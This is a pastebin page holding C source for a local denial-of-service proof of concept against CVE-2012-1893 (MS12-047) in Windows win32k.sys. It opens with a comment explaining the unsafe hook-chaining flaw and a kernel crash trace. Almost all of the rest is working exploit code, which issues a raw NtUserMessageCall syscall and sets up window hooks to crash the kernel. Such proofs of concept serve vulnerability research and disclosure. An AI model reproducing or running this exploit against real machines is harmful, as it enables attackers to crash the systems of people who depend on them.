v 0. Pasted by Cr4sh as c at 2012-07-16 22:00:10 MSK and set expiration to never.

Paste will expire never.

  1. #include "stdafx.h"
  2.  
  3. /*
  4.     CVE-2012-1893 MS12-047 LOCAL DoS PoC   
  5.     By @d_olex (aka Cr4sh)
  6.     Vulnerability in win32k.sys allows us to call any next hook handler from the
  7.     win32k!fnHkINLPCWPRETEXSTRUCT() or win32k!fnHkINLPCWPEXSTRUCT() in unsafe way.
  8.    
  9.     Since win32k doesn't checks the next hook type -- access violation
  10.     occurs when we trying to call the next WH_CALLWNDPROC hook with the arguments
  11.     from the previous WH_CALLWNDPROCRET hook:
  12.     =====================================================================
  13.     Access violation - code c0000005 (!!! second chance !!!)
  14.     win32k!xxxHkCallHook+0x99:
  15.     bf800564 f6402405        test    byte ptr [eax+24h],5
  16.     ChildEBP RetAddr 
  17.     b18d16ac bf8328c5 win32k!xxxHkCallHook+0x99
  18.     b18d1724 bf8f6071 win32k!xxxCallHook2+0x25d
  19.     b18d1740 bf932b6d win32k!xxxCallNextHookEx+0x2d
  20.     b18d176c bf914749 win32k!fnHkINLPCWPRETEXSTRUCT+0x59
  21.     b18d17d8 bf80eef6 win32k!NtUserfnINOUTLPPOINT5+0x5c
  22.     b18d1810 8053d6d8 win32k!NtUserMessageCall+0xae
  23.     b18d1810 0042d65f nt!KiFastCallEntry+0xf8
  24.     0012fa80 0042d6d8 win32k_Hook!_NtUserMessageCall+0xf
  25.     0012fc7c 7e42b372 win32k_Hook!HookHandler_2+0x68
  26. */
  27.  
  28. #define WND_CLASS "CVE-2012-1893"
  29. #define WND_TITLE "CVE-2012-1893"
  30.  
  31. #define WND_W 500
  32. #define WND_H 500
  33.  
  34. HINSTANCE m_hInstance = NULL;
  35. HWND m_hWnd = NULL;
  36. HHOOK m_hHook_1 = NULL;
  37. HHOOK m_hHook_2 = NULL;
  38.  
  39. /*
  40.     NtUserMessageCall service number for Windows XP, change it
  41.     before running exploit on any others Windows versions.
  42. */
  43. DWORD SDT_NtUserMessageCall = 0x11cc;
  44.  
  45. __declspec(naked) LRESULT WINAPI _NtUserMessageCall(
  46.     HWND        hwnd,
  47.     UINT        msg,
  48.     WPARAM      wParam,
  49.     LPARAM      lParam,
  50.     ULONG_PTR   xParam,
  51.     DWORD       xpfnProc,
  52.     BOOL        bAnsi)
  53. {
  54.     __asm
  55.     {
  56.         mov     eax, SDT_NtUserMessageCall
  57.         test    eax, eax
  58.         jz      _failed
  59.         lea     edx, [esp + 4]
  60.         int     0x2e
  61.         retn    0x1c
  62.    
  63. _failed:
  64.         mov     eax, 0xc00000001
  65.         retn    0x1c
  66.     }
  67. }
  68.  
  69. #define TRIGGER()                                                                   \
  70.                                                                                     \
  71.     /* Trigger the vulnerability */                                                 \
  72.     char Something[0x100];                                                          \
  73.     ZeroMemory(Something, sizeof(Something));                                       \
  74.     _NtUserMessageCall(m_hWnd, 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
  75.  
  76. LRESULT CALLBACK HookHandler_1(int nCode, WPARAM wParam, LPARAM lParam)
  77. {
  78.     printf(__FUNCTION__"()\n");
  79.  
  80.     TRIGGER();
  81.  
  82.     return CallNextHookEx(m_hHook_1, nCode, wParam, lParam);
  83. }
  84.  
  85. LRESULT CALLBACK HookHandler_2(int nCode, WPARAM wParam, LPARAM lParam)
  86. {
  87.     printf(__FUNCTION__"()\n");
  88.  
  89.     TRIGGER();
  90.  
  91.     return CallNextHookEx(m_hHook_2, nCode, wParam, lParam);
  92. }
  93.  
  94. #define ID_SHOWMSG 1
  95.  
  96. LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
  97. {
  98.     switch (message)
  99.     {
  100.     case WM_CREATE:
  101.         {
  102.             m_hHook_1 = SetWindowsHookEx(
  103.                 WH_CALLWNDPROC,
  104.                 HookHandler_1,
  105.                 NULL,
  106.                 GetCurrentThreadId()
  107.             );
  108.             if (m_hHook_1 == NULL)
  109.             {
  110.                 printf("SetWindowsHookEx() ERROR %d\n", GetLastError());
  111.             }
  112.  
  113.             m_hHook_2 = SetWindowsHookEx(
  114.                 WH_CALLWNDPROC,
  115.                 HookHandler_2,
  116.                 NULL,
  117.                 GetCurrentThreadId()
  118.             );
  119.             if (m_hHook_2 == NULL)
  120.             {
  121.                 printf("SetWindowsHookEx() ERROR %d\n", GetLastError());
  122.             }
  123.  
  124.             break;
  125.         }
  126.  
  127.     case WM_COMMAND:
  128.         {
  129.             switch (wParam)
  130.             {
  131.             case ID_SHOWMSG:
  132.  
  133.                 MessageBoxA(0, __FUNCTION__, "", 0);
  134.  
  135.                 break;
  136.             }
  137.  
  138.             break;
  139.         }
  140.  
  141.     case WM_DESTROY:
  142.  
  143.         PostQuitMessage(0);
  144.         break;
  145.  
  146.     default:
  147.  
  148.         return DefWindowProc(hWnd, message, wParam, lParam);
  149.     }
  150.  
  151.     return 0;
  152. }
  153.  
  154. int _tmain(int argc, _TCHAR* argv[])
  155. {   
  156.     char Something[0x100];
  157.     ZeroMemory(Something, sizeof(Something));
  158.     _NtUserMessageCall(GetDesktopWindow(), 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
  159.  
  160.     WNDCLASSEX wcex;
  161.     ZeroMemory(&wcex, sizeof(wcex));
  162.     wcex.cbSize = sizeof(WNDCLASSEX);
  163.  
  164.     m_hInstance = (HINSTANCE)GetModuleHandle(NULL);
  165.  
  166.     wcex.style = CS_HREDRAW | CS_VREDRAW;
  167.     wcex.lpfnWndProc = WndProc;
  168.     wcex.hInstance = m_hInstance;   
  169.     wcex.lpszClassName = _T(WND_CLASS);
  170.     wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
  171.  
  172.     // register window class
  173.     if (RegisterClassEx(&wcex) == NULL)
  174.     {
  175.         printf("RegisterClassEx() ERROR %d\n", GetLastError());
  176.         goto end;
  177.     } 
  178.  
  179.     int x = (GetSystemMetrics(SM_CXSCREEN) - WND_W) / 2;
  180.     int y = (GetSystemMetrics(SM_CYSCREEN) - WND_H) / 2;
  181.  
  182.     // create new empty window
  183.     m_hWnd = CreateWindowEx(
  184.         WS_EX_CLIENTEDGE,
  185.         _T(WND_CLASS), _T(WND_TITLE),
  186.         WS_OVERLAPPEDWINDOW,
  187.         x, y, WND_W, WND_H,
  188.         NULL, NULL,
  189.         m_hInstance,
  190.         NULL
  191.     );
  192.     if (m_hWnd)
  193.     {
  194.         ShowWindow(m_hWnd, SW_SHOWNORMAL);
  195.         UpdateWindow(m_hWnd);
  196.  
  197.         // Main message loop
  198.         MSG Msg;
  199.         while (GetMessage(&Msg, NULL, 0, 0))
  200.         {
  201.             TranslateMessage(&Msg);
  202.             DispatchMessage(&Msg);
  203.         }
  204.  
  205.         ExitProcess(0);
  206.     }
  207.     else
  208.     {
  209.         printf("CreateWindow() ERROR %d\n", GetLastError());
  210.     }
  211.  
  212. end:
  213.  
  214.     printf("Press any key to quit...\n");
  215.     _getch();
  216.  
  217.     return 0;
  218. }


Editing is locked.